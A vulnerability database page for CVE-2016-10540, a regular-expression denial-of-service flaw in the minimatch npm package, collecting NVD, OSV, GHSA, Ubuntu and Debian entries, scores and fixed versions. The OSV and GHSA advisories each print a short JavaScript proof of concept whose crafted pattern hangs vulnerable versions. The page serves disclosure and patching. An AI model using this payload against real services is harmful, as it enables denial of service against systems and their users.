CVE-2016-10540
published 2018-05-31CVE-2016-10540: Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript `RegExp` objects. The primary function, `minimatch(path…
PriorityP337high7.5CVSS 3.0
AVNACLPRNUINSUCNINAH
EPSS
1.74%
74.9th percentile
Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript `RegExp` objects. The primary function, `minimatch(path, pattern)` in Minimatch 3.0.1 and earlier is vulnerable to ReDoS in the `pattern` parameter.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | node-minimatch | < node-minimatch 3.0.3-1 (bookworm) | node-minimatch 3.0.3-1 (bookworm) |
| hackerone | minimatch_node_module | — | — |
| minimatch_project | minimatch | <= 3.0.1 | — |
| minimatch_project | minimatch | >= 0 < 3.0.2 | 3.0.2 |
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
osv7.5HIGH
vendor_debian7.5LOW
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Regular Expression Denial of Service in minimatch
osv·2018-10-09
CVE-2016-10540 [HIGH] Regular Expression Denial of Service in minimatch
Regular Expression Denial of Service in minimatch
Affected versions of `minimatch` are vulnerable to regular expression denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`.
## Proof of Concept
```js
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
```
## Recommendation
Update to version 3.0.2 or later.
GHSA
Regular Expression Denial of Service in minimatch
ghsa·2018-10-09
CVE-2016-10540 [HIGH] CWE-400 Regular Expression Denial of Service in minimatch
Regular Expression Denial of Service in minimatch
Affected versions of `minimatch` are vulnerable to regular expression denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`.
## Proof of Concept
```js
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
```
## Recommendation
Update to version 3.0.2 or later.
OSV
CVE-2016-10540: Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript `RegExp` objects
osv·2018-05-31·CVSS 7.5
CVE-2016-10540 [HIGH] CVE-2016-10540: Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript `RegExp` objects
Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript `RegExp` objects. The primary function, `minimatch(path, pattern)` in Minimatch 3.0.1 and earlier is vulnerable to ReDoS in the `pattern` parameter.
Ubuntu
minimatch vulnerability
vendor_ubuntu·2021-03-15
CVE-2016-10540 minimatch vulnerability
Title: minimatch vulnerability
Summary: minimatch could be made to crash if it received specially crafted
input.
It was discovered that minimatch did not perform necessary bounds checking
on regular expressions. An attacker could use this vulnerability to cause a
denial of service.
Instructions: In general, a standard system update will make all the necessary changes.
Debian
CVE-2016-10540: node-minimatch - Minimatch is a minimal matching utility that works by converting glob expression...
vendor_debian·2016·CVSS 7.5
CVE-2016-10540 [HIGH] CVE-2016-10540: node-minimatch - Minimatch is a minimal matching utility that works by converting glob expression...
Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript `RegExp` objects. The primary function, `minimatch(path, pattern)` in Minimatch 3.0.1 and earlier is vulnerable to ReDoS in the `pattern` parameter.
Scope: local
bookworm: resolved (fixed in 3.0.3-1)
bullseye: resolved (fixed in 3.0.3-1)
forky: resolved (fixed in 3.0.3-1)
sid: resolved (fixed in 3.0.3-1)
trixie: resolved (fixed in 3.0.3-1)
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2018-05-31
Published